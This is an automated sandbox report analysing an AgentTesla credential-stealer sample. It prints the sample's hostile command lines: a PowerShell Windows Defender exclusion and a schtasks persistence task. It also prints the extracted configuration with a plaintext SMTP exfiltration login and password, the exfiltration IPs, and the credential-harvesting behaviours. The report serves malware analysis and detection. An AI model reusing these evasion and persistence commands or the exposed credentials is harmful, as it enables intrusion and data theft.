Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 03SPwb995m

Overview

General Information

Sample Name:03SPwb995m (renamed file extension from none to exe)
Analysis ID:528805
MD5:815982590de5e574abb8a0310826e200
SHA1:6c41343a2e25f932f901e53e615cc083209f6a65
SHA256:56960095ea2eda1c680f9df0937a792e9bca7af4922931540688097e6d2a43bb
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 03SPwb995m.exe (PID: 1364 cmdline: "C:\Users\user\Desktop\03SPwb995m.exe" MD5: 815982590DE5E574ABB8A0310826E200)
    • powershell.exe (PID: 5776 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5732 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 03SPwb995m.exe (PID: 5596 cmdline: C:\Users\user\Desktop\03SPwb995m.exe MD5: 815982590DE5E574ABB8A0310826E200)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.03SPwb995m.exe.40065a0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.03SPwb995m.exe.40065a0.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                8.0.03SPwb995m.exe.400000.12.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  8.0.03SPwb995m.exe.400000.12.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    8.2.03SPwb995m.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 15 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicius Add Task From User AppData TempShow sources
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\03SPwb995m.exe" , ParentImage: C:\Users\user\Desktop\03SPwb995m.exe, ParentProcessId: 1364, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp, ProcessId: 5732
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03SPwb995m.exe" , ParentImage: C:\Users\user\Desktop\03SPwb995m.exe, ParentProcessId: 1364, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, ProcessId: 5776
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03SPwb995m.exe" , ParentImage: C:\Users\user\Desktop\03SPwb995m.exe, ParentProcessId: 1364, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe, ProcessId: 5776
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132823406173533744.5776.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 8.0.03SPwb995m.exe.400000.10.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "m-konieczny@europecell.eu", "Password": "26DuBoBmcqO1", "Host": "us2.smtp.mailhostbox.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 03SPwb995m.exeVirustotal: Detection: 22%Perma Link
                      Source: 03SPwb995m.exeReversingLabs: Detection: 28%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeVirustotal: Detection: 22%Perma Link
                      Source: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeReversingLabs: Detection: 28%
                      Source: 8.0.03SPwb995m.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.2.03SPwb995m.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.03SPwb995m.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.03SPwb995m.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.03SPwb995m.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.03SPwb995m.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 03SPwb995m.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: 03SPwb995m.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49833 -> 208.91.199.223:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49834 -> 208.91.199.224:587
                      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                      Source: Joe Sandbox ViewIP Address: 208.91.199.223 208.91.199.223
                      Source: Joe Sandbox ViewIP Address: 208.91.199.224 208.91.199.224
                      Source: global trafficTCP traffic: 192.168.2.4:49833 -> 208.91.199.223:587
                      Source: global trafficTCP traffic: 192.168.2.4:49834 -> 208.91.199.224:587
                      Source: global trafficTCP traffic: 192.168.2.4:49833 -> 208.91.199.223:587
                      Source: global trafficTCP traffic: 192.168.2.4:49834 -> 208.91.199.224:587
                      Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921807859.0000000002EED000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921843959.0000000002EFB000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921764899.0000000002EE5000.00000004.00000001.sdmpString found in binary or memory: http://1pbBaOuWGX2iibYLF.net
                      Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: http://GwvXXB.com
                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 03SPwb995m.exe, 00000008.00000002.921807859.0000000002EED000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921914863.0000000002F13000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: 03SPwb995m.exe, 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, 03SPwb995m.exe, 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: 03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\03SPwb995m.exeJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 8.0.03SPwb995m.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                      Source: 8.2.03SPwb995m.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b7D8661CAu002d2C0Au002d4493u002dAE88u002d5ADC1243DCCAu007d/F57C54F7u002dA459u002d4722u002dB554u002d98E451E63B57.csLarge array initialization: .cctor: array initializer size 12046
                      Source: 03SPwb995m.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 0_2_008FA2A90_2_008FA2A9
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 0_2_02BBDC0C0_2_02BBDC0C
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 0_2_008FA0350_2_008FA035
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_2_0078A2A98_2_0078A2A9
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_2_029649208_2_02964920
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_2_029648F28_2_029648F2
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_2_0296DDD08_2_0296DDD0
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_2_0078A0358_2_0078A035
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FCE6768_3_00FCE676
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FCE67A8_3_00FCE67A
                      Source: 03SPwb995m.exe, 00000000.00000002.677498178.00000000009B0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInternalApplicationIdentityHelp.exeJ vs 03SPwb995m.exe
                      Source: 03SPwb995m.exe, 00000000.00000003.654896294.0000000003E7B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs 03SPwb995m.exe
                      Source: 03SPwb995m.exe, 00000000.00000003.677046086.000000000100F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInternalApplicationIdentityHelp.exeJ vs 03SPwb995m.exe
                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameyEzbuhvRLFNcrCDKthtrydIkQpVLoDG.exe4 vs 03SPwb995m.exe
                      Source: 03SPwb995m.exe, 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameyEzbuhvRLFNcrCDKthtrydIkQpVLoDG.exe4 vs 03SPwb995m.exe
                      Source: 03SPwb995m.exe, 00000000.00000002.681380062.0000000005F70000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs 03SPwb995m.exe
                      Source: 03SPwb995m.exe, 00000008.00000000.674499153.0000000000840000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInternalApplicationIdentityHelp.exeJ vs 03SPwb995m.exe
                      Source: 03SPwb995m.exe, 00000008.00000002.917260578.00000000009D8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 03SPwb995m.exe
                      Source: 03SPwb995m.exe, 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameyEzbuhvRLFNcrCDKthtrydIkQpVLoDG.exe4 vs 03SPwb995m.exe
                      Source: 03SPwb995m.exeBinary or memory string: OriginalFilenameInternalApplicationIdentityHelp.exeJ vs 03SPwb995m.exe
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe 56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                      Source: 03SPwb995m.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: gZfDBpJYZ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 03SPwb995m.exeVirustotal: Detection: 22%
                      Source: 03SPwb995m.exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile read: C:\Users\user\Desktop\03SPwb995m.exeJump to behavior
                      Source: 03SPwb995m.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\03SPwb995m.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\03SPwb995m.exe "C:\Users\user\Desktop\03SPwb995m.exe"
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Users\user\Desktop\03SPwb995m.exe C:\Users\user\Desktop\03SPwb995m.exe
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmpJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Users\user\Desktop\03SPwb995m.exe C:\Users\user\Desktop\03SPwb995m.exeJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile created: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile created: C:\Users\user\AppData\Local\Temp\tmp7B67.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@2/2
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5404:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
                      Source: C:\Users\user\Desktop\03SPwb995m.exeMutant created: \Sessions\1\BaseNamedObjects\CVJFnsnVFoXysEkzODvWP
                      Source: 8.0.03SPwb995m.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.03SPwb995m.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.03SPwb995m.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.03SPwb995m.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: 03SPwb995m.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 03SPwb995m.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: 03SPwb995m.exe, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: gZfDBpJYZ.exe.0.dr, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.0.03SPwb995m.exe.8f0000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.2.03SPwb995m.exe.8f0000.0.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 8.0.03SPwb995m.exe.780000.9.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 8.0.03SPwb995m.exe.780000.2.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 8.0.03SPwb995m.exe.780000.1.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 8.0.03SPwb995m.exe.780000.3.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 8.0.03SPwb995m.exe.780000.5.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 8.0.03SPwb995m.exe.780000.7.unpack, MegaMan.LevelEditor/MainForm.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 0_2_02BBC6BA push esp; ret 0_2_02BBC6C1
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 0_2_02BBC6B8 pushad ; ret 0_2_02BBC6B9
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FCBC57 push es; retf 8_3_00FCBC58
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FCBC57 push es; retf 8_3_00FCBC58
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FCBC57 push es; retf 8_3_00FCBC58
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FCBC57 push es; retf 8_3_00FCBC58
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB26E7 pushfd ; retf 8_3_00FB26E9
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB6DCC pushad ; ret 8_3_00FB6DE5
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB6DCC pushad ; ret 8_3_00FB6DE5
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB10B7 push edx; iretd 8_3_00FB10B9
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB24A7 push es; ret 8_3_00FB24A8
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB818D push es; iretd 8_3_00FB824C
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB818D push es; iretd 8_3_00FB824C
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB215F push es; iretd 8_3_00FB2160
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB124C push esp; iretd 8_3_00FB1255
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB26E7 pushfd ; retf 8_3_00FB26E9
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB6DCC pushad ; ret 8_3_00FB6DE5
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB6DCC pushad ; ret 8_3_00FB6DE5
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB10B7 push edx; iretd 8_3_00FB10B9
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB24A7 push es; ret 8_3_00FB24A8
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB818D push es; iretd 8_3_00FB824C
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB818D push es; iretd 8_3_00FB824C
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB215F push es; iretd 8_3_00FB2160
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_3_00FB124C push esp; iretd 8_3_00FB1255
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_2_0110E332 push eax; ret 8_2_0110E349
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_2_0110D95C push eax; ret 8_2_0110D95D
                      Source: C:\Users\user\Desktop\03SPwb995m.exeCode function: 8_2_0110E38A push eax; ret 8_2_0110E349
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.79660930856
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.79660930856
                      Source: C:\Users\user\Desktop\03SPwb995m.exeFile created: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
